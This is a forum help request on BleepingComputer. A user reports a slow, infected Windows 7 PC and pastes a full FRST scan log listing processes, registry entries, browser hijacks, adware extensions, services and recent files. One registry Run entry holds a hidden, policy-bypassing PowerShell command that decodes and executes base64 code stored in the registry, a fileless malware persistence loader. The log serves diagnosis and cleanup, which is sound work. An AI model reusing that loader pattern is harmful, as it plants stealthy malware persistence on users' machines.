Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Virus making my PC so slow


  • Please log in to reply
7 replies to this topic

#1 Marnel

Marnel

  • Members
  • 52 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Philippines
  • Local time:02:39 AM

Posted 11 November 2015 - 11:41 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-11-2015
Ran by user (administrator) on BAUTISTA (12-11-2015 12:29:07)
Running from C:\Users\user\Downloads
Loaded Profiles: user (Available Profiles: user)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-Agent.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
() D:\GAMES\ONLINE GAMES\Garena Plus\ggdllhost.exe
() C:\Users\user\AppData\Roaming\Settings Manager\SettingsManager.exe
() C:\Users\user\AppData\Roaming\Update Manager\UM.EXE
() D:\GAMES\ONLINE GAMES\Garena Plus\GarenaMessenger.exe
() D:\GAMES\ONLINE GAMES\Garena Plus\bbtalk\BBTalk.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\...\Run: [USB Security] => C:\Program Files (x86)\USB Disk Security\USBGuard.exe [695528 2015-01-31] (Zbshareware Lab)
HKLM-x32\...\Run: [MalwareProtectionLive] => C:\Users\user\AppData\Local\MalwareProtectionLive\MalwareProtectionClient.exe [851488 2015-11-06] ()
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [1024412975] => C:\ProgramData\mscmcnfo.exe [72545408 2010-11-20] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [GarenaPlus] => D:\GAMES\ONLINE GAMES\Garena Plus\GarenaMessenger.exe [10027968 2015-10-09] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2013-04-22] (Microsoft Corporation)
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Browser Extensions] => C:\Users\user\AppData\Roaming\BrowserExtensions\BEHelper.exe [540656 2015-06-09] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Settings Manager] => C:\Users\user\AppData\Roaming\Settings Manager\SettingsManager.EXE [969840 2015-11-03] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [{33D7074C-563D-4D69-875F-595D51FBE7FC}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AhgetfWU').QlGpriXvmdmWTi)));
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [UM] => C:\Users\user\AppData\Roaming\Update Manager\UM.EXE [806064 2015-11-10] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\MountPoints2: G - G:\AutoRun.exe
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\MountPoints2: {1e89a37d-d3c1-11e3-b835-7427ea02c1d4} - E:\AutoRun.exe
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\MountPoints2: {fe4555c4-de52-11e3-b727-7427ea02c1d4} - E:\AutoRun.exe
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\scrnsave.scr [11264 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2014-05-02] (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{19681AF9-0116-4AD2-A0A5-B72A75F7100B}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{598DDEF2-1503-45DC-B1E1-DA6B54F68BE9}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{795FDB82-EDFE-4304-A293-01AFA7CEDC08}: [DhcpNameServer] 192.168.254.254
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = about:blank
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ie
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.msn.com/en-ph/?pc=U270&ocid=U270DHP
hxxp://www.google.com/
SearchScopes: HKU\S-1-5-21-2520790421-254736193-3744350732-1000 -> DefaultScope {3E9AC06D-F60A-4990-AD1C-ACB860F40AE0} URL = hxxps://ph.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=715483&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2520790421-254736193-3744350732-1000 -> {26314958-A633-434B-84F0-AFD107022F56} URL = hxxp://ph.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=407453&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2520790421-254736193-3744350732-1000 -> {3E9AC06D-F60A-4990-AD1C-ACB860F40AE0} URL = hxxps://ph.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=715483&p={searchTerms}
BHO: Browser Extensions -> {34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} -> C:\Users\user\AppData\Roaming\BrowserExtensions\Coupons64.dll [2015-06-09] ()
BHO: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files\AMD\SteadyVideo\SteadyVideo.dll [2012-02-13] (Advanced Micro Devices)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2015-02-08] (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2015-02-08] (Oracle Corporation)
BHO-x32: Browser Extensions -> {34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} -> C:\Users\user\AppData\Roaming\BrowserExtensions\Coupons.dll [2015-06-09] ()
BHO-x32: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll [2012-02-13] (Advanced Micro Devices)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-01-26] (Oracle Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-01-26] (Oracle Corporation)
DPF: HKLM-x32 {48884C41-EFAC-433D-958A-9FADAC41408E} hxxps://www.e-games.com.ph/com/EGamesPlugin.cab
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-07] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-07] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-07] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-07] (Advanced Micro Devices)
 
FireFox:
========
FF ProfilePath: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default
FF DefaultSearchEngine: Yahoo!
FF SelectedSearchEngine: Yahoo!
FF Homepage: hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ff
FF Keyword.URL: hxxps://ph.search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=715483&p=
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_209.dll [2015-07-28] ()
FF Plugin: @java.com/DTPlugin,version=10.75.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2015-02-08] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.75.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2015-02-08] (Oracle Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_209.dll [2015-07-28] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.21.2 -> C:\Windows\SysWOW64\npDeployJava1.dll [2013-06-15] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-01-26] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2010-06-01] (Yahoo! Inc.)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @t.garena.com/garenatalk -> D:\GAMES\ONLINE GAMES\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [2015-01-16] ( Garena)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2520790421-254736193-3744350732-1000: @tools.google.com/Google Update;version=3 -> C:\Users\user\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll [2014-05-10] (Google Inc.)
FF Plugin HKU\S-1-5-21-2520790421-254736193-3744350732-1000: @tools.google.com/Google Update;version=9 -> C:\Users\user\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll [2014-05-10] (Google Inc.)
FF Plugin HKU\S-1-5-21-2520790421-254736193-3744350732-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\user\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-06-08] (Unity Technologies ApS)
FF user.js: detected! => C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\user.js [2015-02-17]
FF SearchPlugin: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\searchplugins\yahoo_ff.xml [2015-08-24]
FF Extension: Low Quality Flash - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\low_quality_flash@pie2k.com [2015-07-28]
FF Extension: Start Page - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{2bc72c53-9bde-4db2-8479-eda9a5e71f4e} [2015-08-24] [not signed]
FF Extension: Ebay Shopping Assistant by Spigot - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{c2fc3c2b-a65a-453c-bf95-101fde56ed1d} [2015-08-24] [not signed]
FF Extension: Slick Savings - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{d3b9472c-f8b1-4a10-935b-1087bac8417f} [2015-08-24] [not signed]
 
Chrome: 
=======
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=en-us
CHR StartupUrls: Default -> "hxxps://ph.search.yahoo.com/?type=715483&fr=yo-yhp-ch"
CHR NewTab: Default -> "chrome-extension://jloeihbcjbkgigodmcacomgfihpiaiip/ntp/newtab.html"
CHR Profile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-04]
CHR Extension: (Google Drive) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-09]
CHR Extension: (YouTube) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-09]
CHR Extension: (Shopping Assistant 40) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cekonfccladjgbdhpgobceahgjdcdbod [2015-11-09]
CHR Extension: (Google Search) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-09]
CHR Extension: (Bing) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2015-07-05]
CHR Extension: (Google Docs Offline) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-05]
CHR Extension: (ClixAddon) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hjnhcgkngeeahimbfhejeaiijecekhba [2015-03-24]
CHR Extension: (New Tab Helper 40) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jloeihbcjbkgigodmcacomgfihpiaiip [2015-08-24]
CHR Extension: (Grammarly Spell Checker & Grammar Checker) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2015-11-12]
CHR Extension: (Sword Art Online Kirito Infection) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkkboefcmihpaclpbbgaiiidhoheammc [2015-05-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-24]
CHR Extension: (Gmail) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
CHR HKU\S-1-5-21-2520790421-254736193-3744350732-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-08-06] (Advanced Micro Devices, Inc.) [File not signed]
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [431920 2014-10-14] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [431920 2014-10-14] (Avira Operations GmbH & Co. KG)
S2 Avira.OE.ServiceHost; C:\Program Files (x86)\Avira\My Avira\Avira.OE.ServiceHost.exe [166192 2014-11-20] (Avira Operations GmbH & Co. KG)
S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [433784 2015-06-17] (BlueStack Systems, Inc.)
R3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [413304 2015-06-17] (BlueStack Systems, Inc.)
R3 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [831096 2015-07-21] (BlueStack Systems, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.149\McCHSvc.exe [289256 2015-06-26] (McAfee, Inc.)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [5267776 2014-01-22] (INCA Internet Co., Ltd.)
S4 TlntSvr; C:\Windows\System32\tlntsvr.exe [81920 2009-07-14] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AODDriver4.1; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [53888 2012-03-05] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [119272 2014-10-14] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131608 2014-10-14] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2014-01-18] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\System32\DRIVERS\avnetflt.sys [43064 2014-10-14] (Avira Operations GmbH & Co. KG)
R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [145528 2015-06-17] (BlueStack Systems)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-11] (Broadcom Corporation)
S3 SDGame; C:\Windows\System32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
U3 TrueSight; C:\Windows\SysWOW64\drivers\TrueSight.sys [33512 2015-01-21] ()
S3 dump_wmimmc; \??\D:\GAMES\ONLINE GAMES\PSO2_Full_Client_2.0221.4\PHANTASYSTARONLINE2\pso2_bin\GameGuard\dump_wmimmc.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X]
S3 gdrv; \??\C:\Windows\gdrv.sys [X]
S3 GGSAFERDriver; \??\D:\GAMES\ONLINE GAMES\Garena Plus\Room\safedrv.sys [X]
S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X]
S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X]
S3 hxsyol; \??\D:\GAMES\ONLINE GAMES\AuraKingdom\avital\hxsy64.sys [X]
S0 ohcmj; System32\drivers\ombsuyy.sys [X]
S3 rqryii; \??\C:\Users\user\Desktop\CCE\ccekrnl.dat [X]
S2 S; C [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-11-12 12:29 - 2015-11-12 12:33 - 00020316 _____ C:\Users\user\Downloads\FRST.txt
2015-11-12 12:28 - 2015-11-12 12:29 - 00000000 ____D C:\FRST
2015-11-12 12:26 - 2015-11-12 12:27 - 02198528 _____ (Farbar) C:\Users\user\Downloads\FRST64.exe
2015-11-12 12:23 - 2015-11-12 12:23 - 00259856 _____ C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
2015-11-12 12:22 - 2015-11-12 12:22 - 00036030 _____ C:\Users\user\Desktop\cc_20151112_122205.reg
2015-11-12 01:25 - 2015-11-12 01:25 - 00025247 _____ C:\Users\user\Downloads\[kat.cr]supergirl.s01e03.hdtv.x264.lol.rartv.torrent
2015-11-12 01:25 - 2015-11-12 01:25 - 00003440 _____ C:\Users\user\Downloads\[kat.cr]limitless.s01e08.hdtv.x264.lol.ettv.torrent
2015-11-12 01:25 - 2015-11-12 01:25 - 00003079 _____ C:\Users\user\Downloads\[kat.cr]izombie.s02e06.hdtv.x264.lol.ettv.torrent
2015-11-12 01:24 - 2015-11-12 01:24 - 00012760 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e22.hdtv.x264.lol.eztv.torrent
2015-11-12 01:24 - 2015-11-12 01:24 - 00003244 _____ C:\Users\user\Downloads\[kat.cr]the.flash.2014.s02e06.hdtv.x264.lol.ettv.torrent
2015-11-12 01:23 - 2015-11-12 01:23 - 00011524 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e21.hdtv.x264.lol.eztv.torrent
2015-11-12 01:22 - 2015-11-12 01:22 - 00021288 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e20.hdtv.x264.lol.ettv.torrent
2015-11-12 01:20 - 2015-11-12 01:20 - 00010383 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e19.hdtv.x264.lol.eztv.torrent
2015-11-12 01:19 - 2015-11-12 01:19 - 00011464 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e18.hdtv.x264.lol.eztv.torrent
2015-11-12 01:19 - 2015-11-12 01:19 - 00010524 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.s01e16.hdtv.x264.lol.eztv.torrent
2015-11-12 01:19 - 2015-11-12 01:19 - 00009166 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e17.hdtv.x264.lol.eztv.torrent
2015-11-12 01:18 - 2015-11-12 01:18 - 00019992 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e15.hdtv.x264.lol.ettv.torrent
2015-11-12 01:17 - 2015-11-12 01:17 - 00009742 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e14.hdtv.x264.lol.eztv.torrent
2015-11-12 01:16 - 2015-11-12 01:16 - 00009486 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e13.hdtv.x264.lol.eztv.torrent
2015-11-12 01:15 - 2015-11-12 01:15 - 00022167 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e12.hdtv.x264.lol.ettv.torrent
2015-11-12 01:15 - 2015-11-12 01:15 - 00010919 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e11.hdtv.x264.lol.eztv.torrent
2015-11-12 01:15 - 2015-11-12 01:15 - 00010446 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e10.hdtv.x264.lol.eztv.torrent
2015-11-12 01:15 - 2015-11-12 01:15 - 00009818 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e09.hdtv.x264.lol.eztv.torrent
2015-11-12 01:02 - 2015-11-12 01:02 - 00021962 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e08.hdtv.x264.lol.ettv.torrent
2015-11-10 11:49 - 2015-11-10 11:49 - 00000000 ____D C:\Users\user\AppData\Roaming\Update Manager
2015-11-10 10:48 - 2015-11-10 10:48 - 00000000 ____D C:\Users\user\AppData\Roaming\LolClient
2015-11-10 10:47 - 2015-11-10 10:47 - 00000723 _____ C:\Users\Public\Desktop\League of Legends.lnk
2015-11-10 08:40 - 2015-11-10 08:40 - 00021944 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e07.hdtv.x264.lol.ettv.torrent
2015-11-10 05:53 - 2015-11-10 05:53 - 00010923 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e06.hdtv.x264.lol.eztv.torrent
2015-11-10 05:52 - 2015-11-10 05:52 - 00011084 _____ C:\Users\user\Downloads\[kat.cr]the.tomorrow.people.us.s01e05.hdtv.x264.lol.eztv.torrent
2015-11-10 05:43 - 2015-11-10 05:43 - 00000000 ____D C:\GarenaDownload
2015-11-10 03:44 - 2015-11-10 03:48 - 18304504 _____ C:\Users\user\Downloads\League of Legends.exe
2015-11-06 02:30 - 2015-02-21 22:55 - 237500960 _____ C:\Users\user\Desktop\VID_20150221_225537.3gp
2015-11-06 02:30 - 2015-02-21 22:50 - 48747679 _____ C:\Users\user\Desktop\VID_20150221_225011.3gp
2015-11-06 02:11 - 2015-04-14 21:12 - 61040628 _____ C:\Users\user\Desktop\VID_20150414_211202.3gp
2015-11-06 02:11 - 2015-04-14 18:57 - 53524937 _____ C:\Users\user\Desktop\VID_20150414_185714.3gp
2015-11-06 02:11 - 2015-04-14 18:27 - 26571286 _____ C:\Users\user\Desktop\VID_20150414_182753.3gp
2015-11-06 02:11 - 2015-04-14 17:44 - 43067706 _____ C:\Users\user\Desktop\VID_20150414_174450.3gp
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-11-12 12:34 - 2014-02-20 23:47 - 00000000 ____D C:\Users\user\AppData\Roaming\Skype
2015-11-12 12:30 - 2009-07-14 12:45 - 00009696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-11-12 12:30 - 2009-07-14 12:45 - 00009696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-11-12 12:25 - 2014-08-02 23:57 - 01090310 _____ C:\Windows\WindowsUpdate.log
